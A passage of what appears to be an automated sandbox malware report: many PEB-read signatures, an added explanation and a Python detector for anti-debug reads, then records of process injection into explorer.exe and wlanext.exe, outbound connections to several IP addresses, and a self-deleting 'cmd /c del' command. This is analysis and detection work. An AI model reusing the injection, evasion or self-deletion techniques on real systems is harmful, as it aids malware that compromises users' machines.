          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E260B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E609 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D262C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A12619 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019EE627 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0A660 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A9866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A9866E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A02674 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019EC640 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A589B3 mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A589B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A589B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D09AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D09AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E29A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5E9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DA9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A029F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A029F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A669C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A049D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A9A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019C8918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019C8918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A6892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4E908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5C912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A1096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A1096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A1096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5C97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A74978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A74978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A50946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA4940 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F6962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5C89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A9A8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FE8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA08C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5C810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D4859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D4859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A66870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A66870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5E872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5E872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E2840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A00854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A84BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A84BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F0BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5CBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FEBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7EBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A98B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A98B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA4B00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FEB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FEB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019C8B50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019CCB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A84B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A84B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A78B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A66B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A66B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A9AB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7EB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA2B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A26AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019DEA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01AA4A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A08A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D8AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D0AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A26ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A04AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A04AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A0CA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F4A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019F4A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019FEA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A5CA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019E0A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_01A7EA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Code function: 3_2_019D6A50 mov eax, dword ptr fs:[00000030h]
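          Every hit above is a read of fs:[30h], which in 32-bit (here SysWOW64) code is the TEB field holding the PEB pointer. What the code does next is what matters for triage: a byte read at PEB+0x02 is the BeingDebugged anti-debug check, a dword read at PEB+0x0C fetches Ldr for import-free API resolution. The scanner below is an added example, not part of the Joe Sandbox report or its engine. It finds the two common encodings of `mov r32, fs:[30h]` in a byte buffer and labels the PEB field touched by the following instruction; the sample bytes are a constructed stub, not bytes taken from tYEY1UeurGz0Mjb.exe, and it does not cover 64-bit code, where the PEB sits at gs:[60h].

```python
"""Locate 32-bit PEB reads (mov r32, fs:[30h]) in raw code bytes (added example)."""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# 32-bit PEB fields commonly read right after fetching the PEB pointer
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters",
              0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


def _peb_field_used(code, pos, reg):
    """If the instruction at pos dereferences [reg+disp8], name the PEB field.

    Recognised forms: movzx r32, byte ptr [reg+d8] (0F B6), mov r32/r8, [reg+d8]
    (8B / 8A) and cmp byte ptr [reg+d8], imm8 (80 /7). All use mod=01, rm=reg.
    """
    for opc in (b"\x0f\xb6", b"\x8b", b"\x8a", b"\x80"):
        n = len(opc)
        if code[pos:pos + n] == opc and pos + n + 1 < len(code):
            modrm = code[pos + n]
            if (modrm & 0xC7) == (0x40 | reg):
                disp8 = code[pos + n + 1]
                return PEB_FIELDS.get(disp8, f"offset 0x{disp8:02x}")
    return None


def find_peb_reads(code, teb_offset=0x30):
    """Return (offset, register, peb_field) for every `mov r32, fs:[teb_offset]`.

    Two encodings are matched: the short form 64 A1 disp32 (eax only) and the
    general form 64 8B /r with mod=00, rm=101, i.e. a bare disp32 operand.
    """
    disp = struct.pack("<I", teb_offset)
    hits = []
    i = 0
    while i < len(code):
        if code[i] == 0x64:  # FS segment override prefix
            if code[i + 1:i + 2] == b"\xa1" and code[i + 2:i + 6] == disp:
                hits.append((i, "eax", _peb_field_used(code, i + 6, 0)))
                i += 6
                continue
            if code[i + 1:i + 2] == b"\x8b" and code[i + 3:i + 7] == disp:
                modrm = code[i + 2]
                if (modrm & 0xC7) == 0x05:
                    reg = (modrm >> 3) & 7
                    hits.append((i, REG32[reg], _peb_field_used(code, i + 7, reg)))
                    i += 7
                    continue
        i += 1
    return hits


# Constructed stub (not bytes from the analysed sample): a BeingDebugged check
# followed by an Ldr fetch, plus a TEB self-pointer read that must not match.
SAMPLE = bytes.fromhex(
    "64A130000000"    # mov eax, dword ptr fs:[30h]      ; eax = PEB
    "0FB64002"        # movzx eax, byte ptr [eax+2]      ; PEB->BeingDebugged
    "85C0"            # test eax, eax
    "7502"            # jnz short +2
    "648B0D30000000"  # mov ecx, dword ptr fs:[30h]      ; ecx = PEB
    "8B490C"          # mov ecx, dword ptr [ecx+0Ch]     ; PEB->Ldr (API resolution)
    "64A118000000"    # mov eax, dword ptr fs:[18h]      ; TEB self pointer, not the PEB
    "C3"              # ret
)

if __name__ == "__main__":
    for off, reg, field in find_peb_reads(SAMPLE):
        print(f"+0x{off:04x}: mov {reg}, fs:[30h] -> {field or 'unclassified'}")
```

          Run against a dumped code section (for example the injected region rather than the packed .NET file on disk), a high count of fs:[30h] reads with no matching import of IsDebuggerPresent or GetProcAddress is the pattern this signature group is pointing at.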
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 5_2_00FEE653 GetProcessHeap,GetLastError,HeapFree,GetLastError,
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 5_2_00FF0063 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 5_2_00FEFD20 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 103.224.212.213 80
          Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exe Network Connect: 185.151.30.212 80
          Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe Network Connect: 128.1.131.130 80
          Source: C:\Windows\explorer.exe Network Connect: 188.114.97.3 80
          Source: C:\Windows\explorer.exe Network Connect: 154.204.100.23 80
          Source: C:\Windows\explorer.exe Network Connect: 216.83.55.173 80
          Source: C:\Windows\explorer.exe Network Connect: 103.8.70.95 80
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe NtClose: Indirect: 0x1CFA56C
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe NtQueueApcThread: Indirect: 0x1CFA4F2
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Memory written: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Section loaded: NULL target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 1028
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: FE0000
          Source: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe Process created: C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tYEY1UeurGz0Mjb.exe"
